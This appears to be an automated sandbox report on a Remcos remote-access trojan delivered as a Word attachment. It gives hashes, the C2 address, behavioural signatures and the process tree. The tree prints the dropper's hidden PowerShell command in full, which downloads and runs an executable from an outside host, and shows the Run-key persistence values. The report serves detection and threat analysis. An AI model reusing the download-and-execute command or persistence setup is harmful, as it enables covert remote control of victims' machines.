remcos | ffdfa8e7d36238ac625b595ff40cc2faae7b76a5b1a85579943c4b42cd4738fe

Analysis

max time kernel
151s
max time network
148s
platform
windows7_x64
resource
win7v20210408
submitted
20-04-2021 07:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MVC RFQSpecification.doc
Size

295KB
MD5

191f38f0ef0adca84572330b29a32034
SHA1

358ebb28a5a5adf4bfccc1199901a91156063101
SHA256

ffdfa8e7d36238ac625b595ff40cc2faae7b76a5b1a85579943c4b42cd4738fe
SHA512

a9a5f93954baae12194549d477ca2241149615fcec9ef79765329f832967b1f5c34f78ddee11b637884d371cc090c86dfdaf2fdd62a6a08b5c7177828daede18

Score

10^/10

remcos persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

httP://twart.myfirewall.org/firewall.exe

Extracted

Family

remcos

sandshoe.myfirewall.org:2415

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	420	1668	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	900	1668	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1264	1668	powershell.exe	WINWORD.EXE

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 420 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

firewall.exesvchost.exe

pid process

384 firewall.exe
1744 svchost.exe
Loads dropped DLL 4 IoCs

Processes:

powershell.execmd.exe

pid process

420 powershell.exe
420 powershell.exe
1976 cmd.exe
1976 cmd.exe

flow	pid	process
7	420	powershell.exe

pid	process
384	firewall.exe
1744	svchost.exe

pid	process
420	powershell.exe
420	powershell.exe
1976	cmd.exe
1976	cmd.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

firewall.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\	firewall.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\Users\\Admin\\AppData\\Roaming\\Remcos\\svchost.exe\""	firewall.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\Users\\Admin\\AppData\\Roaming\\Remcos\\svchost.exe\""	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 1744 set thread context of 1756 1744 svchost.exe svchost.exe
Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

description	pid	process	target process
PID 1744 set thread context of 1756	1744	svchost.exe	svchost.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1668 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

420 powershell.exe
420 powershell.exe
1264 powershell.exe
900 powershell.exe
1264 powershell.exe
900 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 420 powershell.exe
Token: SeDebugPrivilege 1264 powershell.exe
Token: SeDebugPrivilege 900 powershell.exe
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

WINWORD.EXEsvchost.exe

pid process

1668 WINWORD.EXE
1668 WINWORD.EXE
1668 WINWORD.EXE
1668 WINWORD.EXE
1744 svchost.exe

pid	process
1668	WINWORD.EXE

pid	process
420	powershell.exe
420	powershell.exe
1264	powershell.exe
900	powershell.exe
1264	powershell.exe
900	powershell.exe

description	pid	process
Token: SeDebugPrivilege	420	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	900	powershell.exe

pid	process
1668	WINWORD.EXE
1668	WINWORD.EXE
1668	WINWORD.EXE
1668	WINWORD.EXE
1744	svchost.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

WINWORD.EXEpowershell.exefirewall.exeWScript.execmd.exesvchost.exe

description	pid	process	target process
PID 1668 wrote to memory of 420	1668	WINWORD.EXE	powershell.exe
PID 1668 wrote to memory of 420	1668	WINWORD.EXE	powershell.exe
PID 1668 wrote to memory of 420	1668	WINWORD.EXE	powershell.exe
PID 1668 wrote to memory of 420	1668	WINWORD.EXE	powershell.exe
PID 1668 wrote to memory of 900	1668	WINWORD.EXE	powershell.exe
PID 1668 wrote to memory of 900	1668	WINWORD.EXE	powershell.exe
PID 1668 wrote to memory of 900	1668	WINWORD.EXE	powershell.exe
PID 1668 wrote to memory of 900	1668	WINWORD.EXE	powershell.exe
PID 1668 wrote to memory of 1264	1668	WINWORD.EXE	powershell.exe
PID 1668 wrote to memory of 1264	1668	WINWORD.EXE	powershell.exe
PID 1668 wrote to memory of 1264	1668	WINWORD.EXE	powershell.exe
PID 1668 wrote to memory of 1264	1668	WINWORD.EXE	powershell.exe
PID 420 wrote to memory of 384	420	powershell.exe	firewall.exe
PID 420 wrote to memory of 384	420	powershell.exe	firewall.exe
PID 420 wrote to memory of 384	420	powershell.exe	firewall.exe
PID 420 wrote to memory of 384	420	powershell.exe	firewall.exe
PID 384 wrote to memory of 296	384	firewall.exe	WScript.exe
PID 384 wrote to memory of 296	384	firewall.exe	WScript.exe
PID 384 wrote to memory of 296	384	firewall.exe	WScript.exe
PID 384 wrote to memory of 296	384	firewall.exe	WScript.exe
PID 296 wrote to memory of 1976	296	WScript.exe	cmd.exe
PID 296 wrote to memory of 1976	296	WScript.exe	cmd.exe
PID 296 wrote to memory of 1976	296	WScript.exe	cmd.exe
PID 296 wrote to memory of 1976	296	WScript.exe	cmd.exe
PID 1976 wrote to memory of 1744	1976	cmd.exe	svchost.exe
PID 1976 wrote to memory of 1744	1976	cmd.exe	svchost.exe
PID 1976 wrote to memory of 1744	1976	cmd.exe	svchost.exe
PID 1976 wrote to memory of 1744	1976	cmd.exe	svchost.exe
PID 1744 wrote to memory of 1756	1744	svchost.exe	svchost.exe
PID 1744 wrote to memory of 1756	1744	svchost.exe	svchost.exe
PID 1744 wrote to memory of 1756	1744	svchost.exe	svchost.exe
PID 1744 wrote to memory of 1756	1744	svchost.exe	svchost.exe
PID 1744 wrote to memory of 1756	1744	svchost.exe	svchost.exe
PID 1744 wrote to memory of 1756	1744	svchost.exe	svchost.exe
PID 1744 wrote to memory of 1756	1744	svchost.exe	svchost.exe
PID 1744 wrote to memory of 1756	1744	svchost.exe	svchost.exe
PID 1744 wrote to memory of 1756	1744	svchost.exe	svchost.exe
PID 1744 wrote to memory of 1756	1744	svchost.exe	svchost.exe
PID 1744 wrote to memory of 1756	1744	svchost.exe	svchost.exe
PID 1668 wrote to memory of 1424	1668	WINWORD.EXE	splwow64.exe
PID 1668 wrote to memory of 1424	1668	WINWORD.EXE	splwow64.exe
PID 1668 wrote to memory of 1424	1668	WINWORD.EXE	splwow64.exe
PID 1668 wrote to memory of 1424	1668	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\MVC RFQSpecification.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1668

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://twart.myfirewall.org/firewall.exe','C:\Users\Admin\AppData\Roaming\firewall.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\firewall.exe'"
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:420

C:\Users\Admin\AppData\Roaming\firewall.exe
"C:\Users\Admin\AppData\Roaming\firewall.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:384

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:296

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Remcos\svchost.exe"
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1976

C:\Users\Admin\AppData\Roaming\Remcos\svchost.exe
C:\Users\Admin\AppData\Roaming\Remcos\svchost.exe
6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe
7⤵
PID:1756

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://twart.myfirewall.org/firewall.exe','C:\Users\Admin\AppData\Roaming\firewall.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\firewall.exe'"
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://twart.myfirewall.org/firewall.exe','C:\Users\Admin\AppData\Roaming\firewall.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\firewall.exe'"
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1424

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_10a2719f-ab19-452c-9537-375fecbe5f96
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1abda922-9e0e-4200-89d0-60796083afcc
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_32b21970-4839-4ac5-a2ad-cc925aecc47c
MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_32b21970-4839-4ac5-a2ad-cc925aecc47c
MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_60554f64-a36e-4439-8748-76f202d7cb75
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ccb18ff-7a22-469e-90e7-ccc861e1432b
MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7bc5ca8a-50eb-4a28-856a-31595e01418a
MD5
597009ea0430a463753e0f5b1d1a249e

SHA1
4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

SHA256
3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

SHA512
5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd47eb21-a96b-4ccd-99d7-0d9f3f6c10b6
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c9b427a0-6073-4eb8-9b09-f8e4712d7ab5
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
bcb70490d1a61f22192163a5293522f7

SHA1
5b608627b155d5b0302e4d2ab19c69e71f7c62b5

SHA256
b33569ef8af357dfe30addcf2f1f56c5f950f1a8f06913c20652049d2834f503

SHA512
bc199d03712162ac306b6717962d71d0132b24bc20785622feae22cece9775befee798413e418b2a4e2a7acaeb146d211aa2ddd7f9cd5835b2a7def90d29ee35

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
dee0cc808491beee356b53a00699737d

SHA1
54651d09d38e0c5d486f5b0c729c61fa5a59132c

SHA256
87adc4bf3dceda346a7976dee67b2d7104a6eeed62fe142a93e92c3ab6925a71

SHA512
03981e73a45f0f6fce8f1236489f28f65199bf4cf02de47413ac412d63d8277cc7f054d7079f61b50027266d4e4d1432ea48bf48443fea79c710c2a264060597

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
12789dd3cab3dbda57e4fb2e3e73c938

SHA1
287b2eccf1a7edcbc04264d01e5cc5b9d2a5b530

SHA256
c0438108086c7020e96d0d4535571eee0d1a835e1c75316fcaa9d3ee8422cad6

SHA512
9ba6635ed46da6f9a3eb67937480862b7f90d18757ab97571b681358820096038f159a785c5728c0870574406144725906226988b2b1fd4e1419160cb5c8e476

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.vbs
MD5
19a866a859bf53960e0838991626b634

SHA1
068d247b78fcef6c5fdcd06a69479c1852d72b66

SHA256
4f19248011c8de17ee236772e367532e2fc946c209e3a777da4925eb86fdeab7

SHA512
9ff83f6ee2f8bba5effc9e596961a263c0397a0f286b2f54ad430486b607260f8e531e7e10617352fada3a4572a370e80522cdb136b56f480a95de42d4210520

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
4db68001ffdb894d1e7c84cf55deb89f

SHA1
987349a9c6b5fe1af88e294ba4ca61eb37c3681c

SHA256
d25decd1fb7e8d6781766f1aa0e3bee27d145b9c13aada2a43c745e22b83e1b2

SHA512
558b41751f49e4ae1ba28dc15a1515dad0bfef7907e348d3432b19ea975985712aac5350bed253a0f36afff7cf37fc72fa0e6b0994356527417bee091469b1b3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
4db68001ffdb894d1e7c84cf55deb89f

SHA1
987349a9c6b5fe1af88e294ba4ca61eb37c3681c

SHA256
d25decd1fb7e8d6781766f1aa0e3bee27d145b9c13aada2a43c745e22b83e1b2

SHA512
558b41751f49e4ae1ba28dc15a1515dad0bfef7907e348d3432b19ea975985712aac5350bed253a0f36afff7cf37fc72fa0e6b0994356527417bee091469b1b3

Download Submit
C:\Users\Admin\AppData\Roaming\Remcos\svchost.exe
MD5
93d5a6c80343c85fb4aedd5b1de38613

SHA1
12e13aba5ea9dc2d86030befeac7c124dc17a6eb

SHA256
9626b19106a81d22416acbbe7ea291de316ca3a8f359beb9fe09850649fd5292

SHA512
6d30c5c43db627499332d43c1bb0f176be5a26679554229ec493c44342e77093a03e6b5f5576df28cb17d2b6392b3e979d5551393519c187620c9e8856c68e52

Download Submit
C:\Users\Admin\AppData\Roaming\Remcos\svchost.exe
MD5
93d5a6c80343c85fb4aedd5b1de38613

SHA1
12e13aba5ea9dc2d86030befeac7c124dc17a6eb

SHA256
9626b19106a81d22416acbbe7ea291de316ca3a8f359beb9fe09850649fd5292

SHA512
6d30c5c43db627499332d43c1bb0f176be5a26679554229ec493c44342e77093a03e6b5f5576df28cb17d2b6392b3e979d5551393519c187620c9e8856c68e52

Download Submit
C:\Users\Admin\AppData\Roaming\firewall.exe
MD5
43abb480f28bd50ac6df751840b8f93a

SHA1
23454000ce60aa62efd3a411c8a1237854279de2

SHA256
89136d251359e836b36774dd2a9432e24bfdea5b62f98d53d9e9c5131acb6cc1

SHA512
dfecc43feef6578d4bdbfafb4df6811810ab85e450fed58a88863b0eadff8c7cf71599eb8456aa6caf982d5db8fac1ea16d47fec663eba836f5bada9d8d28055

Download Submit
C:\Users\Admin\AppData\Roaming\firewall.exe
MD5
93d5a6c80343c85fb4aedd5b1de38613

SHA1
12e13aba5ea9dc2d86030befeac7c124dc17a6eb

SHA256
9626b19106a81d22416acbbe7ea291de316ca3a8f359beb9fe09850649fd5292

SHA512
6d30c5c43db627499332d43c1bb0f176be5a26679554229ec493c44342e77093a03e6b5f5576df28cb17d2b6392b3e979d5551393519c187620c9e8856c68e52

Download Submit
C:\Users\Admin\AppData\Roaming\firewall.exe
MD5
93d5a6c80343c85fb4aedd5b1de38613

SHA1
12e13aba5ea9dc2d86030befeac7c124dc17a6eb

SHA256
9626b19106a81d22416acbbe7ea291de316ca3a8f359beb9fe09850649fd5292

SHA512
6d30c5c43db627499332d43c1bb0f176be5a26679554229ec493c44342e77093a03e6b5f5576df28cb17d2b6392b3e979d5551393519c187620c9e8856c68e52

Download Submit
\Users\Admin\AppData\Roaming\Remcos\svchost.exe
MD5
93d5a6c80343c85fb4aedd5b1de38613

SHA1
12e13aba5ea9dc2d86030befeac7c124dc17a6eb

SHA256
9626b19106a81d22416acbbe7ea291de316ca3a8f359beb9fe09850649fd5292

SHA512
6d30c5c43db627499332d43c1bb0f176be5a26679554229ec493c44342e77093a03e6b5f5576df28cb17d2b6392b3e979d5551393519c187620c9e8856c68e52

Download Submit
\Users\Admin\AppData\Roaming\Remcos\svchost.exe
MD5
93d5a6c80343c85fb4aedd5b1de38613

SHA1
12e13aba5ea9dc2d86030befeac7c124dc17a6eb

SHA256
9626b19106a81d22416acbbe7ea291de316ca3a8f359beb9fe09850649fd5292

SHA512
6d30c5c43db627499332d43c1bb0f176be5a26679554229ec493c44342e77093a03e6b5f5576df28cb17d2b6392b3e979d5551393519c187620c9e8856c68e52

Download Submit
\Users\Admin\AppData\Roaming\firewall.exe
MD5
93d5a6c80343c85fb4aedd5b1de38613

SHA1
12e13aba5ea9dc2d86030befeac7c124dc17a6eb

SHA256
9626b19106a81d22416acbbe7ea291de316ca3a8f359beb9fe09850649fd5292

SHA512
6d30c5c43db627499332d43c1bb0f176be5a26679554229ec493c44342e77093a03e6b5f5576df28cb17d2b6392b3e979d5551393519c187620c9e8856c68e52

Download Submit
\Users\Admin\AppData\Roaming\firewall.exe
MD5
93d5a6c80343c85fb4aedd5b1de38613

SHA1
12e13aba5ea9dc2d86030befeac7c124dc17a6eb

SHA256
9626b19106a81d22416acbbe7ea291de316ca3a8f359beb9fe09850649fd5292

SHA512
6d30c5c43db627499332d43c1bb0f176be5a26679554229ec493c44342e77093a03e6b5f5576df28cb17d2b6392b3e979d5551393519c187620c9e8856c68e52

Download Submit
memory/296-129-0x0000000000000000-mapping.dmp

Download
memory/384-125-0x0000000000000000-mapping.dmp

Download
memory/420-63-0x0000000075211000-0x0000000075213000-memory.dmp

Filesize
8KB

Download
memory/420-64-0x0000000002250000-0x0000000002251000-memory.dmp

Filesize
4KB

Download
memory/420-95-0x00000000056C0000-0x00000000056C1000-memory.dmp

Filesize
4KB

Download
memory/420-90-0x0000000005610000-0x0000000005611000-memory.dmp

Filesize
4KB

Download
memory/420-62-0x0000000000000000-mapping.dmp

Download
memory/420-103-0x0000000006250000-0x0000000006251000-memory.dmp

Filesize
4KB

Download
memory/420-67-0x00000000047D2000-0x00000000047D3000-memory.dmp

Filesize
4KB

Download
memory/420-111-0x0000000006320000-0x0000000006321000-memory.dmp

Filesize
4KB

Download
memory/420-96-0x00000000061C0000-0x00000000061C1000-memory.dmp

Filesize
4KB

Download
memory/420-69-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/420-68-0x0000000004750000-0x0000000004751000-memory.dmp

Filesize
4KB

Download
memory/420-66-0x00000000047D0000-0x00000000047D1000-memory.dmp

Filesize
4KB

Download
memory/420-107-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/420-65-0x0000000004810000-0x0000000004811000-memory.dmp

Filesize
4KB

Download
memory/900-86-0x0000000001EC0000-0x0000000002B0A000-memory.dmp

Filesize
12.3MB

Download
memory/900-70-0x0000000000000000-mapping.dmp

Download
memory/1264-72-0x0000000000000000-mapping.dmp

Download
memory/1264-85-0x00000000049B2000-0x00000000049B3000-memory.dmp

Filesize
4KB

Download
memory/1264-84-0x00000000049B0000-0x00000000049B1000-memory.dmp

Filesize
4KB

Download
memory/1424-143-0x0000000000000000-mapping.dmp

Download
memory/1424-144-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp

Filesize
8KB

Download
memory/1668-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1668-60-0x000000006FEC1000-0x000000006FEC3000-memory.dmp

Filesize
8KB

Download
memory/1668-59-0x0000000072441000-0x0000000072444000-memory.dmp

Filesize
12KB

Download
memory/1744-136-0x0000000000000000-mapping.dmp

Download
memory/1756-139-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/1756-142-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/1756-140-0x0000000000413FA4-mapping.dmp

Download
memory/1976-132-0x0000000000000000-mapping.dmp

Download